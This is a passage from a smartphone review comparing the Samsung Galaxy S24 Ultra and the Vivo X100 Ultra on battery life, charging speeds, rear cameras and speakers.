There is a 5,000mAh battery included inside the Galaxy S24 Ultra. The Vivo X100 Ultra, on the flip side, includes a 5,500mAh battery pack. Both of these phones have outstanding battery life. Those of you who don’t do a lot of graphically demanding tasks on phones could even get over the 8-hour screen-on-time mark on both phones in a single day… while not being too careful.
The battery life on both of these phones is that good, yes. They’re amongst the best smartphones for battery life when it comes to flagship devices. Your mileage will vary, of course, as this is the battery life we’re talking about. Some of you will fly under this mark, others probably above it, it all depends on a number of factors. The bottom line is that both smartphones offer great battery life, there’s no doubt about it.
When it comes to charging, the Vivo X100 Ultra takes the cake, in several ways. It offers faster wired and wireless charging, while it also comes with a charger in the box. It supports 80W wired, 30W wireless, and 5W reverse wired charging. The Galaxy S24 Ultra offers 45W wired, 15W wireless, and 4.5W reverse wireless charging. Unlike the Vivo X100 Ultra, however, this handset does not include a charger in the box.
Samsung Galaxy S24 Ultra vs Vivo X100 Ultra: Cameras
The Samsung Galaxy S24 Ultra has four rear-facing cameras. There’s a 200-megapixel main camera, a 12-megapixel ultrawide unit (120-degree FoV), a 10-megapixel telephoto camera (3x optical zoom), and a 50-megapixel periscope telephoto camera (5x optical zoom). The Vivo X100 Ultra has a 50-megapixel main camera (gimbal OIS), a 50-megapixel ultrawide camera (116-degree FoV), and a 200-megapixel periscope telephoto unit (3.7x optical zoom). ZEISS optics are a part of the Vivo X100 Ultra package, by the way.
Both of these phones capture outstanding photos. There are differences, though. They both prefer warmer colors, to a degree, and both sets of images do end up looking a bit processed. The Galaxy S24 Ultra can still push processing a bit too far at times, though. The colors are great on both most of the time, but Samsung’s phone has the tendency of pushing the saturation a bit too high at times. Other than that, the results from both are great. The Vivo X100 Ultra’s ultrawide camera does tend to provide better results more often than not, and the same goes for the periscope camera, especially at higher zoom levels.
In low light, both phones perform really well, especially when it comes to their main cameras. The Vivo X100 Ultra does tend to deal with light reflections a bit better than the Galaxy S24 Ultra. Other than that, the images from both look great. Their secondary cameras are usable in low light, for sure, but the main shooters are preferable.
Audio
There is a set of stereo speakers on both of these smartphones. The ones on the Galaxy S24 Ultra are a bit louder, though. The difference is not big, but it’s noticeable. The sound output is well-balanced on both, though.
Neither phone includes an audio jack. You can always use their Type-C ports for wired audio connections, though. If not, there’s Bluetooth 5.3 included on the Galaxy S24 Ultra, and Bluetooth 5.4 on the Vivo X100 Ultra for wireless connections.